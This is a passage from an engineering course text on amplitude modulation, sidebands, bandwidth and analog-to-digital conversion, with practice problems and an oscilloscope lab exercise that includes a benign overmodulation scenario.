Wait! To transmit that lousy tuning fork signal my antenna needs to be at least 68 km? That’s over 42 miles! We’d need an antenna that extends into the upper parts of the atmosphere for that. Clearly, that’s not going to work.

Well, I know that if I want to listen to the Navy game on the radio (because for some reason I avoided the mandatory fun), I can tune in to AM radio station 1430 WNAV.
Recall from Chapter 19 that when we refer to a commercial AM radio station such as 1430 WNAV, the 1430 is the center of its transmission frequency in kHz. So what size antenna does WNAV use?

Practice Problem 20.2
(a) What is the wavelength of an AM radio station whose transmission frequency is 1430 kHz?
(b) What is the approximate antenna length if the station uses an antenna that is half a wavelength long?

105 meters? Okay, that's still big, about 115 yards, almost an entire football field, but at least you don't need an antenna that reaches into outer space now. In reality, WNAV's antenna, pictured at right, is 117 meters. We're close!

The purpose of those two examples was to demonstrate that we need to somehow get our baseband information to a higher frequency (shorter wavelength) in order to be able to transmit it across our channel. Higher frequencies give us reasonable antenna sizes plus some added benefits: first, signals attenuate less quickly if the higher frequencies are well chosen. Second, multiple people, whose voices all occupy the same baseband frequencies, can communicate without interfering if each transmits on a different higher frequency range. We can shift baseband information to higher frequencies for transmission using a process called modulation.

2. Modulation

To overcome limitations of the communications channel and permit multiple access, information signals are impressed upon a higher-frequency carrier signal for transmission. This process is called modulation. Now we're dealing with two signals:
1. The original ("baseband") information signal, whose frequency is too low to transmit efficiently.
2.
The higher-frequency ("carrier") signal, which we can transmit efficiently, so we use it to carry our information.

Mathematically, the higher-frequency carrier is the sine wave
$v_c(t) = V_c \sin(2\pi f_c t + \theta)$

Modulation is the process of varying one of three properties (amplitude, frequency or phase) of a high-frequency carrier using the lower-frequency information signal (baseband signal). A modulator is the component of a communication system that performs modulation. The three types of modulation we will focus on are:
Amplitude modulation (AM): varying the amplitude $V_c$ of the carrier with the information signal.
Frequency modulation (FM): varying the frequency $f_c$ of the carrier with the information signal.
Phase modulation (PM): varying the phase angle $\theta$ of the carrier with the information signal.

Since the intention of the "Wireless" section of EC310 is to give you a broad understanding of wireless communication techniques rather than to make you communication engineers, we're only going to go into more detail with amplitude modulation (AM) in this chapter. This is NOT to say that frequency modulation and phase modulation are unimportant; they're very important and very widely used. The fact is that there's only so much modulation that can be reasonably covered in the last several chapters of this course, and AM is the easiest to visualize and demonstrate. Later, in Chapter 22: Digital Modulation, we will again address amplitude, frequency and phase modulation to some extent as they apply to digital communications.

3. Amplitude Modulation (AM)

In amplitude modulation, the information signal is used to vary the amplitude of the carrier sine wave. For simplicity, consider a sine wave information signal $v_m(t)$ (a 440 Hz tuning fork) and a sinusoidal carrier $v_c(t)$ with frequency 5000 Hz (5 kHz):
$v_m(t) = V_m \sin(2\pi f_m t) = V_m \sin(2\pi \cdot 440\, t)$

The diagram of an amplitude modulation system using this information signal follows.
The AM wave $v_{AM}(t)$ is the product of the carrier (with amplitude 1) and a modulating signal. The modulating signal is the information signal $v_m(t)$ with an added offset, $V_c$. The AM signal is then given by:
$v_{AM}(t) = (V_c + v_m(t))\sin(2\pi f_c t) = (V_c + V_m \sin(2\pi f_m t))\sin(2\pi f_c t)$

In the figure below, the top plot is the information signal and the bottom is the resulting AM signal. Note that the information signal starts at a value of zero (for approximately 2 msec), so at first the AM signal is just the unmodulated carrier (the carrier is not yet being modulated). When the information signal is no longer zero, it starts to modulate the carrier's amplitude as shown. The horizontal axes are time in msec. The information signal is equal to zero at the beginning, then changes to the tuning fork sine wave at approximately 2 msec. Here, the carrier and information signal parameters are: $f_c$ = 5 kHz, $V_c$ = 10 V, $f_m$ = 440 Hz, $V_m$ = 7.5 V.

A zoomed-in plot of the resulting modulated AM signal follows, showing the graphical relation between $V_m$ and $V_c$:

The envelope of the AM signal (drawn onto the plot below as a dashed red line) varies above and below the unmodulated carrier amplitude, $V_c$. It is the envelope that carries the information signal; the receiver must separate the envelope from the received AM signal to recover the information that was transmitted. In this case, the envelope is in the shape of a sine wave, which is the same as the information signal. The values of $V_m$ and $V_c$ are related by the modulation index (m).

Modulation Index
The relationship between the information signal amplitude, $V_m$, and the unmodulated carrier amplitude, $V_c$, is expressed as a ratio called the modulation index (m), defined as:
$m = \dfrac{V_m}{V_c}$
Sometimes m is expressed as a percentage: percent modulation = m × 100%. The following figure shows the AM signal at three different values of percent modulation: 20%, 50% and 90%. Overall, the greater the value of m, the closer the envelope gets to the horizontal (time) axis.
We can also determine the modulation index m from the maximum and minimum values of the envelope of $v_{AM}(t)$. With $V_{max}$ the maximum value of the envelope and $V_{min}$ the minimum value:
$V_{max} = V_c + V_m, \qquad V_{min} = V_c - V_m$
so that
$V_c = \dfrac{V_{max} + V_{min}}{2}, \qquad V_m = \dfrac{V_{max} - V_{min}}{2}, \qquad m = \dfrac{V_m}{V_c} = \dfrac{V_{max} - V_{min}}{V_{max} + V_{min}}$

In order for the AM signal to convey the original signal accurately and prevent distortion, the information signal amplitude ($V_m$) must be no greater than the unmodulated carrier signal amplitude ($V_c$). Here again, the unmodulated carrier refers to the AM signal when the information signal amplitude is zero ($V_m$ = 0), in which case $v_{AM}(t) = V_c \sin(2\pi f_c t)$. The maximum usable modulation index is m = 1.0, corresponding to 100% modulation, when $V_m$ equals $V_c$. When $V_m$ is greater than $V_c$ (that is, m > 1), overmodulation occurs. Overmodulation, depicted below, distorts the AM signal's envelope, and since the envelope holds the information, the recovered information signal is distorted too.

Practice Problem 20.3
If a carrier signal $v_c(t) = 9\sin(2\pi \cdot 5000\, t)$ V is modulated by a sine wave $v_m(t) = 7.5\sin(2\pi \cdot 440\, t)$ V, what is the percentage modulation of the resulting AM signal?

Now that we have a basic understanding of how amplitude modulation works in the time domain, let's look at AM in the frequency domain.

4. AM in the Frequency Domain

Recall that the equation for the amplitude modulated waveform, when the information signal is a single sine wave, is
$v_{AM}(t) = (V_c + V_m \sin(2\pi f_m t))\sin(2\pi f_c t)$
We already know the frequency domain representations of the modulating signal $v_m(t)$ and the carrier signal $v_c(t)$, but how does the amplitude modulated signal look in the frequency domain?
To answer this question, recall the trig identity for the product of two sines:
$\sin A \sin B = \tfrac{1}{2}\cos(A - B) - \tfrac{1}{2}\cos(A + B)$
Applying this identity to the AM signal gives:
$v_{AM}(t) = (V_c + V_m \sin(2\pi f_m t))\sin(2\pi f_c t)$
$= V_c \sin(2\pi f_c t) + V_m \sin(2\pi f_c t)\sin(2\pi f_m t)$
$= V_c \sin(2\pi f_c t) + \dfrac{V_m}{2}\cos(2\pi(f_c - f_m)t) - \dfrac{V_m}{2}\cos(2\pi(f_c + f_m)t)$

This means that when a single sine wave information signal modulates the carrier in AM, the resulting AM signal contains three sinusoids: one at the carrier frequency, one $f_m$ Hz below the carrier frequency, and one $f_m$ Hz above the carrier frequency. For the tuning fork example we have $f_c$ = 5 kHz, $f_c - f_m$ = 4.560 kHz and $f_c + f_m$ = 5.440 kHz. The trig identity puts the amplitudes at $f_c - f_m$ and $f_c + f_m$ at one half of $V_m$. The resulting frequency domain plot for the tuning fork example looks like the following (note that the plot shows the magnitude of the frequency content, so the negative cosine amplitude shows up as a positive-going spike):

The process of modulating a carrier creates an upper and a lower sideband, which are apparent in the frequency plot. The lower sideband (LSB) is the portion of the transmitted signal with frequency content below the carrier frequency, and the upper sideband (USB) has frequency content above the carrier frequency. For the tuning fork example, the USB is the 5440 Hz cosine and the LSB is the 4560 Hz cosine. On a frequency plot of an AM signal, the lower sideband is a mirror image of the upper sideband about the carrier frequency.

What is the AM signal's bandwidth? Since bandwidth is the highest transmitted frequency minus the lowest transmitted frequency, it is $(f_c + f_m) - (f_c - f_m) = 2 f_m$ = 880 Hz.
This is twice the bandwidth of the information signal we started with: if we didn't modulate the information signal, the transmission bandwidth would have been only $f_m$ (440 Hz in this case)[2]. So by transmitting with AM we have doubled the bandwidth required to transmit the signal. Why is this a concern? Bandwidth is the #2 limiting factor in communications systems (noise is #1) and can be expensive to use, so we want to send as much information as possible while occupying the minimum amount of bandwidth.

Let's look at a slightly more complex example. Suppose the information signal is comprised of two sine waves:
$v_m(t) = V_1 \sin(2\pi f_1 t) + V_2 \sin(2\pi f_2 t)$
What does the AM signal look like? Again, we apply the same trig identity to each sine in the information signal:
$v_{AM}(t) = (V_c + v_m(t))\sin(2\pi f_c t)$
$= (V_c + V_1 \sin(2\pi f_1 t) + V_2 \sin(2\pi f_2 t))\sin(2\pi f_c t)$
$= V_c \sin(2\pi f_c t) + V_1 \sin(2\pi f_c t)\sin(2\pi f_1 t) + V_2 \sin(2\pi f_c t)\sin(2\pi f_2 t)$
$= V_c \sin(2\pi f_c t) + \dfrac{V_1}{2}\cos(2\pi(f_c - f_1)t) - \dfrac{V_1}{2}\cos(2\pi(f_c + f_1)t) + \dfrac{V_2}{2}\cos(2\pi(f_c - f_2)t) - \dfrac{V_2}{2}\cos(2\pi(f_c + f_2)t)$

The net result is that for each sine in the message we wind up with two cosines in the AM signal: one with a frequency greater than the carrier frequency, one with a frequency less than the carrier frequency. The bandwidth is still the highest frequency in the AM signal minus the lowest, which is two times the maximum frequency in the information signal. That is, if $f_{max}$ is the larger of the two frequencies in the information signal ($f_1$ or $f_2$), then the AM bandwidth is $BW = 2 f_{max}$.

Practice Problem 20.4
Suppose we want to transmit the sound of a two-chime doorbell ($f_1$ = 349 Hz, $f_2$ = 440 Hz) using VLF (very low frequency) communications (let $f_c$ = 20 kHz). Each of the chimes has an amplitude of 10 V, and the carrier's amplitude is 20 V.
Sketch the frequency domain representation of the transmitted signal and determine the bandwidth. Which of the two chime frequencies determines the bandwidth?

[2] The bandwidth of a baseband signal is taken to be its maximum frequency content. If the message is a single sinusoid at a frequency of $f_m$ Hz, we say its bandwidth is $f_m$ Hz.

Practice Problem 20.5
If a carrier signal $v_c(t) = 20\sin(2\pi \cdot 5000\, t)$ V is amplitude modulated by the information signal $v_m(t) = 4\sin(2\pi \cdot 200\, t) - 6\cos(2\pi \cdot 400\, t + \phi)$, where $\phi$ is a constant phase offset (which does not change which frequencies are present), sketch the frequency plot for the resulting AM signal and calculate the transmission bandwidth.

An example of an even more complicated signal is the signal created by recording an oboe (the musical instrument) playing a single note. When someone blows into the mouthpiece of an oboe to play a note, their fingers are placed over certain holes to create the note. Because of the structure of the oboe (its length, diameter and placement of the holes, for example), the sound the instrument makes is actually a combination of a number of tones (sinusoids) with different amplitudes. Different instruments can all play the same note, but each instrument sounds different because its structure produces different sinusoids with different amplitudes. Amplitude modulation of an oboe playing the note Concert A is demonstrated in the next figure. In this figure, the maximum frequency present in the note is approximately 4 kHz, so the bandwidth of the AM signal is $BW = 2 f_{max}$ = 2 (4 kHz) = 8 kHz.

Other common information signals, such as voice or music, are composed of many different frequencies. AM modulation still works the same way, and the transmission bandwidth is again $BW = 2 f_{max}$, where $f_{max}$ is the maximum frequency content present in the information signal.

5.
Demodulation

Modulation is used to upshift the frequency content of a baseband signal to facilitate transmission (e.g., to allow a smaller antenna). Demodulation is performed in the receiver to downshift that frequency content back to baseband. For example, if the 440 Hz tuning fork signal were transmitted on Annapolis AM radio station WYRE 810 AM ($f_c$ = 810 kHz), the transmitted signal is at approximately 810 kHz, which is well outside our hearing (we can hear signals with frequency content up to approximately 20 kHz). In order to hear the tuning fork signal, our car's radio receiver must shift the frequency content back down to its original range (440 Hz). This is demodulation; it "undoes" what modulation did to the information signal. How demodulation works is beyond the scope of this course, but you should be aware of its importance in a communication system.

What's the point? AM is by no means the only form of modulation (though it's probably the easiest to work through and visualize). The intent of this course is not to make you all communications engineers, but you do need enough background in modulation to understand the implications (especially with regard to bandwidth) moving forward. You'll see this again in a few lessons, with digital applications.

Problems

1. (a) Calculate the wavelength of signals with frequencies of 1.5 kHz, 18 MHz, and 22 GHz.
(b) Since an antenna needed to transmit these frequencies must be at least a tenth of the wavelength, which signal frequency would NOT be practical for direct (i.e., baseband) transmission?
(c) Name and define a technique that could be used to transmit the frequency in part (b).

2. An AM signal is comprised of the following two signals:
$v_m(t) = 80\cos(2\pi \cdot 5000\, t)$ volts
$v_c(t) = 100\cos(2\pi \cdot 800{,}000\, t)$ volts
where $v_m(t)$ is the message and $v_c(t)$ is the "unmodulated carrier" (i.e., the output of the modulator when no information signal is present).
(a) Find the carrier frequency, the upper-sideband and lower-sideband frequencies, and the percent modulation (m).
(b) Suppose $v_m(t)$ changes to $120\cos(2\pi \cdot 5000\, t)$. Find the new percent modulation (m). Give the technical term for this condition and explain the effects of this condition occurring.

3. A radio station, 1280 AM, is conducting a monthly test of the Emergency Alert System. The test begins with an annoying sound comprised of two pure tones at 853 Hz and 960 Hz. The signal being broadcast has exactly five frequency components, i.e., the signal could be written as follows:
$v_{AM}(t) = V_1 \sin(2\pi f_1 t) + V_2 \cos(2\pi f_2 t) - V_3 \cos(2\pi f_3 t) + V_4 \cos(2\pi f_4 t) - V_5 \cos(2\pi f_5 t)$ volts
(a) Find the five frequencies that comprise the AM signal being broadcast. Recall that the carrier frequency and the two sideband frequencies for each of the emergency alert tones will be involved.
(b) Find the bandwidth for this particular broadcast.
(c) Determine which of these two emergency alert tones (853 Hz or 960 Hz) determines the bandwidth.
(d) What is the bandwidth assigned to a commercial AM radio station in the United States?

4. Musical notes can be viewed as pure tones (if we ignore the "warmth" added by any particular instrument). Pure tones are signals that contain only one frequency. Chords are combinations of notes, such as the C-Major chord on the piano, comprised of notes C, E, and G. If the radio station 1280 AM broadcasts the C-Major chord, it would broadcast the following seven frequencies, listed in ascending order and annotated by note and sideband:
f_LSB-G = 1,279,608 Hz
f_LSB-E = 1,279,670 Hz
f_LSB-C = 1,279,738 Hz
f_carrier = 1,280,000 Hz
f_USB-C = 1,280,262 Hz
f_USB-E = 1,280,330 Hz
f_USB-G = 1,280,392 Hz
Notice that in the lower sideband, the notes are in reverse order. G, the highest pitch in the chord, is always the farthest from the carrier frequency. The carrier frequency is exactly in the middle.
Assume that the carrier amplitude is 100 V, and the voltages for the three musical notes are all 20 V.
(a) Sketch this broadcast in the frequency domain (label frequencies and amplitudes).
(b) After demodulation, what frequencies would be heard coming out of your AM radio's speaker?
(c) Find the bandwidth of the broadcast and determine which note (C, E, or G) sets the bandwidth.

5. For the following plots of AM signals, determine Vmax, Vmin, Vc, Vm and m. Show your work!
(a) [plot: AM signal, volts (-15 to 15) versus time (msec), 0 to 5 ms]
(b) [plot: AM signal, volts (-20 to 20) versus time (msec), 0 to 5 ms]
(c) [plot: AM signal, volts (-15 to 15) versus time (msec), 0 to 5 ms]
(d) [plot: AM signal, volts (-20 to 20) versus time (msec), 0 to 5 ms]

6. Determine fc and fm for any of the AM signals in problem 5 (parts (a)-(d)). (Hint: fc and fm are the same for each case.) Using these values of fc and fm, along with your answers to problem 5, sketch the frequency content for each of these AM signals (parts (a)-(d)).

7. For any of the plots shown in problem 5, determine the bandwidth of the transmission. Note that each of these AM signals has a single sinusoid as the information signal. (Hint: the bandwidth is the same for each case.)

Security Exercise 20
Introduction to Amplitude Modulated Signals

PART I: SET UP
Check off each step as you complete it.

Step One: Function generator setup.
□ Turn on power to the lab bench (the switch on the right that says "120V OUTLETS").
□ Turn on the function generator.
□ Select the sinusoidal function by pressing the button with the sine wave on it. The function generator display should indicate a small sine wave.
□ Turn any other lit buttons off.
□ Select the Utility function and the Output Setup soft key.
□ Load should be High Z. Push Done.
□ Press the output button.

Step Two: Oscilloscope setup.
□ Turn on the oscilloscope.
□ Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed.
□ Connect banana plug cables (found under the bench on the plastic Quad board) from the function generator's output to the CH 1 input on the oscilloscope (red to red and black to black).

PART II: AMPLITUDE MODULATED SIGNAL IN THE TIME DOMAIN
An Amplitude Modulated (AM) signal looks somewhat like the figure that follows (Figure 1). This depiction includes the AM signal's envelope and the definitions of Vm (message amplitude), Vc (carrier amplitude), Vmax (max envelope voltage) and Vmin (min envelope voltage). The information signal (message) modulates the amplitude of the carrier.
□ On the function generator select the Store/Recall button, then push Recall State, then State 3, then Recall State again. Make sure the output button is lit.
□ Push AUTOSET on the oscilloscope and you will see an AM signal.
□ Press CH 1 MENU on the oscilloscope and make the following settings: Coupling: AC; BW Limit: OFF; Volts/Div: COARSE; Probe: 1X; Invert: Off.
□ If a trace appears for CH 2, press the CH 2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab.
□ With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the position knob under the vertical section in the CH 1 column, so that the "1→" on the left side of the LCD is adjacent to the major horizontal axis (centered vertically on the display).
□ Adjust the vertical scale (Volts/Div) to enlarge the displayed signal so that it occupies more than half of the oscilloscope display.
□ Adjust the horizontal range (Sec/Div) so that you can see an AM waveform similar to the one shown in Figure 1 above. You may have to adjust the trigger level knob (to the far right below the AUTOSET button) to clean up the signal.
Turn the knob so that you see the trigger level (the arrow at the far right of the screen) rise from the center line. Hint: if you have trouble removing the "jitter" from the graph, use the "Run/Stop" button in the upper right hand corner of the oscilloscope to pause the capture.

Once the display is properly adjusted, use the boxes on the oscilloscope to measure the following parameters. Record your results in Question 1 on your answer sheet.
1. Measure Vmin and Vmax (see Figure 1).
2. Measure the period of the carrier, Tcarrier (the higher frequency signal). You will have to adjust the horizontal (Sec/Div) scale to accurately measure the period of one cycle of the high frequency carrier signal.
3. Measure Tmessage, the period of the message (the lower frequency signal). You will need to adjust the horizontal (Sec/Div) scale back out. Note: Tmessage is the period of the wave that rides along the top of the carrier as the carrier is modulated.

Calculate the modulation index m, the carrier frequency (fc), the message signal's frequency (fm), the amplitude of the carrier (Vc) and the amplitude of the message signal (Vm). Use the equations shown in Table 1 below along with your measured values. Record your results in Question 1 on your answer sheet.

Table 1
$V_m = \dfrac{V_{max} - V_{min}}{2}$
$V_c = \dfrac{V_{max} + V_{min}}{2}$
$m = \dfrac{V_m}{V_c} = \dfrac{V_{max} - V_{min}}{V_{max} + V_{min}}$
$f_c = \dfrac{1}{T_c}$
$f_m = \dfrac{1}{T_m}$

Question 2: Determine the equation of the AM waveform displayed on the oscilloscope. Write your answer on your answer sheet using the form below, with numerical values replacing A, B, C and D:
$v_{AM}(t) = [A + B\sin(2\pi C t)]\sin(2\pi D t)$

PART III: AMPLITUDE MODULATED SIGNAL IN THE FREQUENCY DOMAIN
Let's look at the frequency spectrum of this signal. In class we manipulated the above equation to show which frequencies will show up in the frequency domain:
$v_{AM}(t) = V_c \sin(2\pi f_c t) + \dfrac{V_m}{2}\cos(2\pi(f_c - f_m)t) - \dfrac{V_m}{2}\cos(2\pi(f_c + f_m)t)$
There are 3 frequencies in the AM signal: the carrier and its 2 sideband frequencies.
So let us try to see this signal in terms of its frequency content. The oscilloscope performs a fast Fourier transform (FFT) and displays the magnitudes of the frequencies present in the signal versus frequency, so the horizontal scale shows frequency instead of time. The y-axis shows values in decibels, which can be ignored for this lab.
□ Press AUTOSET and you will see the options to display the signal in time or in frequency (FFT). (NOTE: If the FFT option does not appear when you press AUTOSET, press the MATH MENU button.)
□ Push the button next to FFT (or stay in FFT operation) and you will see spikes at specific frequencies.
□ Set the horizontal scale to read 12.5 kHz per division using the Sec/Div knob.

Question 3. Determine the values of the center and sideband frequencies. Use the frequency cursor (recall that when using the FFT to show frequency content, the source must be MATH, not CH 1 or CH 2, in order to use the frequency plot cursors).
Question 4. Sketch your frequency plot. Label the frequency axis with your values and have your instructor check it.
Question 5. What is the bandwidth of the amplitude modulated waveform?
Question 6. Rewrite your AM signal using the form below:
$v_{AM}(t) = A\sin(2\pi B t) + C\cos(2\pi D t) - E\cos(2\pi F t)$
filling in numerical values for A, B, C, D, E and F (different from the A-D above).
Question 7. Is this AM signal within the range of commercial AM radio frequencies?
Question 8. If the information signal from above contained many frequencies (including frequencies higher than the fm you measured), how would this affect the bandwidth of the amplitude modulated waveform?

PART IV: ANOTHER AMPLITUDE MODULATED SIGNAL
You have a message signal you would like to transmit, but do not have access to an AM transmitter. An evil user offers to transmit your signal (for a small fee). You pay the fee. Your customers start complaining that your signal sounds terrible.
You examine the amplitude modulated signal that the evil user has generated for you:
□ On the function generator select the Store/Recall button, then push Recall State, then State 4, then Recall State again. Make sure the output button is lit.
□ Push AUTOSET on the oscilloscope and you will see an AM signal.
□ Eliminate the CH 2 signal (if necessary), vertically center the waveform and adjust the horizontal range and trigger level to stabilize the AM signal.

Question 9. Explain the problem with the evil user's AM signal (hint: look at the shape of the envelope).

Security Exercise 20 Answer Sheet
Name: ____________________
Question 1: Vmax ______ Vmin ______ Vc ______ Vm ______ Tc (s) ______ Tm (s) ______ fc (kHz) ______ fm (kHz) ______ m ______
Question 2: ____________________
Question 3: fc = __________ flsb = __________ fusb = __________
Question 4: ____________________ Instructor / Lab Tech: __________
Question 5: ____________________
Question 6: ____________________
Question 7: ____________________
Question 8: ____________________
Question 9: ____________________

Chapter 21: Analog to Digital Conversion

Objectives:
(f) Provide examples of analog and digital communication systems.
(g) Describe the advantages of digital over analog communication.
(h) Discuss the basic steps of the analog-to-digital conversion process: sampling, and quantizing/encoding.
(i) Given an analog waveform, sampling rate, and resolution, determine the resulting quantized signal and the binary encoded A/D output.
(j) Calculate the Nyquist sampling rate for an analog signal.
(k) Given the number of bits in an A/D process and the sample frequency, determine the generated bit rate.
(l) Describe how the number of bits used in the A/D process affects the reconstructed analog signal.

Connection to Cyber Security
In Chapter 20, you learned about modulation, and that it is impractical to transmit signals at baseband frequencies through free space. Modulation upshifts the frequency of transmission, to allow for smaller antennas. For an AM communication system, the signals at various places in the system are shown below. We could also have used FM or PM, in which case the signal that exists in the communication channel (free space) might look like the following, depending on the information signal (left: frequency modulation, right: phase modulation). In a digital communication system, the information is composed of 1s and 0s, and the information signal is composed of voltage pulses that represent the 1s and 0s. Hackers can attack our system in a number of ways, such as "reading our mail" or injecting their own information into our channel. In the digital age, cyber attacks usually fall on digital communication systems. But where do the 1s and 0s come from? Chapter 21 deals with how 1s and 0s are created from an analog signal.

1. Analog Systems.
When you look at the waveform below, you should notice that it is a signal that varies continuously in time and amplitude. If we observed nature, we would see that nature produces signals like this (i.e., changes in pressure, variations in light, sounds, etc.).
Analog systems use analog electrical signals to represent these natural patterns, such as the voltage signal created from the sound waves of a person speaking into a microphone, shown in the next figure.

What do you think might be an example of an analog system in action? How about an 8-track tape player playing the songs on Michael Jackson's 8-track album, Thriller. This is a great example of an analog system, but my guess is you have no idea what an 8-track is. So, let's list some other analog systems that may ring a bell: AM/FM radios, rotary telephones, cassette tape players, VCRs, broadcast TVs, the microphone you are singing into at Bancroft's karaoke night... So maybe you're thinking, "I still have no idea what that stuff is!" There's probably a reason for that. We don't really use many systems that are completely analog anymore; digital communications are more widely used.

2. Digital Systems.
Let's think for a second about comparisons between what was used in the past and what you use now:

Type of Information      Past Device               Present Device
Music                    Cassette Tape             CD
Videos                   VHS (VCR)                 DVD/Blu-ray Disc
Broadcast Television     Standard Definition TV    High Definition TV (HDTV)

We want the same types of information but are using a different method to get them: digital systems. Digital systems use electrical signals that represent discrete (often binary) values. These electrical signals are referred to as digital signals. Specifically, binary baseband digital signals use two discrete voltage levels to represent binary 1 or 0 (bits), as shown in the example plots below. Combining multiple bits into words permits us to represent more than just two things. Digital circuits operate on digital signals, performing logic and arithmetic functions. Interesting fact, and important to the class: digital signals are not representative of signals that occur in nature. Natural signals are analog, and must be converted into digital format to be used in a digital system. Great!
So we're using a new method to get the same information. Is this a big deal? It is, because using digital systems offers a number of advantages over using analog systems.

3. Digital Advantages.
1. Relative noise immunity. (What is the number one limiting factor in communications? Noise.) Relative noise immunity is the most important advantage of digital communications. Between the transmitter and receiver, whether the system is analog or digital, noise always corrupts the transmitted signal. In general, an analog receiver has no idea what the received signal is supposed to be after it has been corrupted by noise, but a digital receiver only has to decide between a finite set of choices: for example, a binary digital system's receiver must only decide at any time whether it is receiving a binary 0 or a binary 1. This means that receiver circuitry can be designed to distinguish between a 0 and a 1 even in the presence of a significant amount of noise. It is possible that the noise could be severe enough that the receiver gets confused and incorrectly decides it is receiving a 0 when it should be deciding a 1 (or vice versa); these are referred to as bit errors. But in general, digital systems are much better in noisy environments.

In long distance digital communications, digital signals can be stripped of any noise in a process called signal regeneration. Consider a long distance transmission that incorporates a set of relay stations in order for the signals to move from transmitter to receiver, as shown in the figure to the right. Relay stations are needed because the farther a signal travels, the weaker it gets; to make it to its destination, it must be amplified and retransmitted at the relay stations. If this were an analog system, the analog signal would be received, amplified and retransmitted at each station. However, noise is now a part of the signal, and so is also amplified at each station.
In a digital communication system, a digital signal is received (receiver decides 0s or 1s), regenerated (digital signal recreated based on the 0s and 1s), and then retransmitted at each station. With signal regeneration, the noise can be eliminated at each station. This can only be done in digital communication systems.

2. Error detection/correction. Digital signal processing (DSP) techniques allow the detection and correction of bit errors. Even if a digital signal contains bit errors, many of these errors can be fixed at the receiver through the use of error correcting codes. Error correcting codes allow, for example, CDs with minor scratches to be played without errors. Analog systems cannot detect or correct errors.

3. Easier multiplexing. Multiplexing is the process of allowing multiple signals to share the same transmission channel. For example, digital telephony allows carrying 24 phone conversations on a single wire (called a T1 line) at the same time. Digital signal processing techniques enable this.

4. Easier to process and store. Since computers store and use digital data, digital signals can be easily processed by computers. Similarly, the digital format lends itself to easier storage of communication signals (e.g., smaller storage footprint). DSP allows operations such as filtering, equalization and mixing to be done in software without the use of analog circuits. DSP also permits data compression (transforming signals so that fewer bits are needed to represent them). An example of DSP would be Garage Band, for you musicians, or photo editing software like Adobe Photoshop, for those with a knack for photography.

To emphasize this again, these advantages are huge. This is such a big deal that even though communication systems used to be exclusively analog, it is worth the billions and even trillions of dollars that the government and private sector are spending to migrate communication systems to digital.

4. Conversion from Analog to Digital (A/D)

If nature produces analog signals, how do we create digital signals from them? Before we can use digital transmission, we must convert the signal of interest into a digital format. The natural signal (e.g., speech) that we want to transmit will be acquired using an analog device. The analog signal will be translated into a digital signal using a method called analog-to-digital (A/D) conversion. The device used to perform this translation is known as an analog-to-digital converter or ADC. Through A/D conversion, analog signals are changed into a sequence of binary numbers (encoded bits), from which the digital signal is created by the transmitter. This process is depicted below. There are two major steps involved in converting an analog signal to a digital signal represented by binary numbers: sampling, and quantizing/encoding.

Steps for A/D conversion:

1. Sampling. This is a process of inspecting the value (voltage) of an analog signal at regular time intervals. The time between samples is referred to as the sample period (T, in seconds), and the number of samples taken per second is referred to as the sample frequency (fs, in samples/second or Hz). Basically, sampling is taking snapshot values of the analog signal so that you have an accurate representation of how the analog signal is changing over time.

The receiver must convert the bits it receives into sample values, and then recreate what it thinks the analog signal looks like from the samples alone. As you might deduce from the figure below, when the samples are closer together (smaller sample period, which means higher sample frequency), the analog signal is more accurately represented. Note that with the lower sample rates, some of the fluctuations in the analog signal have no samples on them, so the samples are not a good representation of the analog signal. How high does our sampling frequency fs need to be in order to accurately represent the signal?
That is, what is the minimum sample frequency for the A/D to work properly? We could consider taking just a few samples (i.e., using a low sampling rate), which means less information to transmit to the receiver. But if we choose that option, when we reconstruct the signal, it will likely be a terrible representation of the original. The low sampling rate will only work well for very slowly changing (low frequency) signals. Alternatively, we could choose the highest possible sampling rate known to man, to ensure that we can accurately capture even very fast signal fluctuations. But the higher the sampling rate, the higher the cost of the equipment, and more information must be transmitted. In addition, if we decide to record the communications, our saved files will be unnecessarily enormous. But what is “low” and what is “high”? In other words, how exactly do I go about choosing my sampling rate?

In order to accurately reconstruct an analog signal from its samples, one must sample faster than the Nyquist sampling rate (also called the Nyquist rate), fN, given by the formula fN = 2fmax, where fmax is the highest frequency component of the analog signal. That is, the sampling frequency must be more than twice the value of the highest frequency component of the signal:

fs > fN, where fN = 2fmax

If the sample rate is not greater than the Nyquist rate, a problem called aliasing results. We’ll talk more about aliasing in the lab, but it can cause severe distortion of your signal. The Nyquist sample rate is a floor on the sampling rate, and practical systems sample greater than the Nyquist rate. Some examples of common sample rates are:

Signal   Signal frequency range   Standard Sample Rate
Voice    300 Hz-3 kHz             8 kHz
Music    0-20 kHz                 44.1 kHz (CD-quality)
Music    0-20 kHz                 192 kHz (DVD-quality)

Practice Problem 21.1 Consider the signal from the oboe depicted below in time and frequency domain representations.
1. What is the maximum frequency present in the oboe signal?
2. Based upon this, what sampling rate must be exceeded in order to accurately reconstruct the signal from its samples?

(Figure: the oboe signal; left plot, Voltage (V) versus Time (sec) from 1 to 1.005 s; right plot, Voltage (V) versus Frequency (Hz))

2. Quantizing/Encoding. Quantizing/encoding is the process of mapping the sampled analog voltage values to discrete voltage levels, which are then represented by binary numbers (bits). This is needed because the analog sample values are real numbers that occur on a continuum. That is, for example, if a sine wave of amplitude 1 V is being sampled, the sample values could be any value between -1 V and +1 V… an infinite number of possibilities. In any digital system, there is only a finite amount of memory, so only a finite number of values can be used to represent the samples of the analog signal. Converting a sample value from the set of infinite possibilities to one of a finite set of values is called quantization or quantizing. These values are referred to as quantization levels.

Inputs to A/D converters are limited to a specific voltage range. For the sine wave example above, we assumed that all values of the analog input fall within a range of -1.0 to +1.0 volts (note: this is the typical voltage range of voice or music signals on a computer, such as in .wav or .mp3 files). A/D systems are characterized by the number of bits they have available to perform quantization. The number of bits determines the number of quantization levels. An N-bit A/D converter has 2^N quantization levels and outputs binary words of length N (that is, it outputs N-bit values for every sample). For example, a 3-bit A/D system has 2^3 = 8 quantization levels, so all samples of a 1 V analog signal that is input to this A/D will be quantized into one of only 8 possible quantization levels, and each sample will be represented by a 3-bit digital word.
In general, the A/D converter will partition a range of voltage from some vmin to some vmax into 2^N voltage intervals, each of size q volts, where

q = (vmax - vmin) / 2^N

Some common examples of A/D quantizing are digital telephony, which uses 8-bit A/D (2^8 = 256 quantization levels), CD audio, which uses 16-bit A/D (2^16 = 65,536 quantization levels), and DVD audio, which uses 24-bit A/D (2^24 = 16,777,216 quantization levels).

